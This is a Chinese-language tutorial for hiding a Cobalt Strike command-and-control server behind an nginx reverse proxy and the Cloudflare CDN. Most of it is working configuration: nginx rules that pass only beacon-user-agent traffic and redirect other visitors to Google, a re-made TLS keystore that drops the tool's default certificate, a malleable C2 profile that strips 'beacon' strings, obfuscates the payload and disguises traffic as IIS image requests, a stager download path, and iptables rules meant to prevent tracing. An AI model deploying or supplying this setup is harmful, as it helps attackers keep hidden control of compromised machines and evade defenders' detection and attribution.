C2隐藏
nginx反代+cdn隐藏C2服务器
首先注册一个cloudflare的账号,然后在域名供应商中设置域名服务器为cloudflare的名称服务器,接着可以在cloudflare中添加一个关于CS服务器的A记录
免费域名供应商:https://www.freenom.com/
反代配置:安装nginx并配置反向代理隐藏(不配反代可跳过这步)
apt install nginx进入nginx配置文件(/etc/nginx/nginx.conf),配置关键信息
server{
listen 443 ssl default_server;
server_name abc123.com www.abc123.com;
ssl_certificate /usr/local/nginx/cert/abc123.com/public.pem; #公钥
ssl_certificate_key /usr/local/nginx/cert/abc123.com/private.key; #私钥
location / {
index index.html;
root /usr/share/nginx/html;
}
}
server {
#配置cs上线有关
set $C2_SERVER https://127.0.0.1:2083; #当beacon为https时,ip只能为127.0.0.1
set $REDIRECT_DOMAIN https://google.com;
# set $REDIRECT_DOMAIN https://baidu.com;
listen 443 ssl default_server;
server_name *.abc123.com; #你的域名
ssl_certificate /usr/local/nginx/cert/abc123.com/public.pem; #公钥
ssl_certificate_key /usr/local/nginx/cert/abc123.com/private.key; #私钥
#设置和cs上线
location / {
if ($http_user_agent != "Mozilla/5.0 (Windows NT 6.1; Trident/8.0; rv:12.0)"){
return 302 $REDIRECT_DOMAIN$request_uri;
}
proxy_pass $C2_SERVER;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; #转发源ip获取真正的外网ip
# If you want to pass the C2 server's "Server" header through then uncomment this line
# proxy_pass_header Server;
expires off;
proxy_redirect off;
proxy_set_header Host $host;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Real-IP $remote_addr;
}
}等后面配置好证书才能正常启动,要么先注释掉证书配置
修改证书配置文件
CS的默认证书共有三个(cobaltstrike.store,proxy.store,ssl.store)
cobaltstrike.store :用于服务端和客户端加密通讯 proxy.store:用于浏览器代理也就是browserpivot功能 ssl.store证书:如果没有配置https-certificate选项,并且使用的是https监听器那么Cs默认就会使用这个证书
可以查看一下CS的默认证书,特征很明显
keytool -list -v -keystore cobaltstrike.store
使用cloudflare创建一个证书
优化配置绕过缓存,规则url为:
abc123.com/*、*.abc123.com/*
以下abc123.com均为自己的域名
建议将证书密码123456都修改为其他更为复杂的密码
将证书公钥和私钥分别放到
/usr/local/nginx/cert/public.pem和/usr/local/nginx/cert/private.pem处,使用 keytool 重新创建 store 证书openssl pkcs12 -export -in /usr/local/nginx/cert/public.pem -inkey /usr/local/nginx/cert/private.key -out abc123.com.p12 -name abc123.com -passout pass:123456
keytool -importkeystore -deststorepass 123456 -destkeypass 123456 -destkeystore abc123.com.store -srckeystore abc123.com.p12 -srcstoretype PKCS12 -srcstorepass 123456 -alias abc123.com修改teamserver启动文件,将其替换成刚刚创建的
abc123.com.store,并更改证书密码
到https://github.com/rsmudge/Malleable-C2-Profiles项目里获取一个profile模板,配置文件如下:
将abc123.com修改为自己的域名,还有修改证书密码
# default sleep time is 60s
set sleeptime "10000";
# jitter factor 0-99% [randomize callback times]
set jitter "0";
set maxdns "255";
stage {
set stomppe "true";
set obfuscate "true";
set cleanup "true";
set sleep_mask "true";
transform-x86 {
prepend "\x90\x90\x90";
strrep "ReflectiveLoader" "";
strrep "beacon" "";
}
transform-x64 {
prepend "\x90\x90\x90";
strrep "ReflectiveLoader" "";
strrep "beacon" "";
}
}
https-certificate {
set keystore "abc123.com.store"; #证书名字
set password "123456"; #证书密码
}
#以上没有配置域名和证书的时候可以先不写
http-config {
set headers "Content-Type";
header "Content-Type" "text/html;charset=UTF-8"; #防止无法执行命令
set trust_x_forwarded_for "true";
}
set useragent "Mozilla/5.0 (Windows NT 6.1; Trident/8.0; rv:12.0)"; #ua识别防止被检测
http-get {
set uri "/milu_image/";
client {
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8";
#header "Host" "abc123.com"; #域名,还没有配置cloudflare的时候这一行注释掉
header "Referer" "http://www.google.com";
header "Pragma" "no-cache";
header "Cache-Control" "no-cache";
metadata {
netbios;
append ".jpg"; # 传输内容自动追加的后缀
uri-append;
}
}
server {
header "Content-Type" "img/jpg";
header "Server" "Microsoft-IIS/6.0";
header "X-Powered-By" "ASP.NET";
output {
base64; # 加密方式(base64、base64url、netbios、netbiosu)
print;
}
}
}
http-post {
set uri "/milu_email/ /updates.rs /infot.gif /cnaid.jpg /cusid.jpg";
client {
header "Content-Type" "application/octet-stream";
#header "Host" "abc123.com"; #域名,还没有配置cloudflare的时候这一行注释掉
header "Referer" "http://www.google.com";
header "Pragma" "no-cache";
header "Cache-Control" "no-cache";
id {
netbiosu;
append ".png";
uri-append;
}
output {
base64;
print;
}
}
server {
header "Content-Type" "img/jpg";
header "Server" "Microsoft-IIS/6.0";
header "X-Powered-By" "ASP.NET";
output {
base64;
print;
}
}
}
#分段过程(小的payload落地后会去下载大马)其中的下载请求相关的流量是由http-stager来定义
http-stager {
set uri_x86 "/get32.gif";
set uri_x64 "/get64.gif";
client {
parameter "id" "1234";
header "Cookie" "SomeValue";
}
server {
header "Content-Type" "image/gif";
output {
prepend "GIF89a";
print;
}
}
}配置好后将其命令为
abc123.com.profile防止溯源到端口,再对监听端口做限制
iptables -I INPUT -p TCP --dport 2083 -j DROP
iptables -I INPUT -s 127.0.0.1 -p TCP --dport 2083 -j ACCEPT
#撤销规则
iptables -D INPUT -p TCP --dport 2083 -j DROP
iptables -D INPUT -s 127.0.0.1 -p TCP --dport 2083 -j ACCEPT服务器启动CS
./teamserver x.x.x.x password abc123.com.profilecloudflare免费支持的cdn转发如下:
http:
80、8080、8880、2052、2082、2086、2095
https:
443、2053、2083、2087、2096、8443无配置反代:
配置了反代:
OK,在配置了反代的情况下,正常用户访问域名会跳转到google,真实ip也被隐藏,而即使被nmap扫描也看不出异常。只有当带有cs特征(ua头或访问路径(本文未配置))的请求才会被nginx反代到指定c2端口,被控端看到的连接为
abc123.com:443VNC
若想使用VNC功能,需要将VNC端口设置为cf允许转发的端口
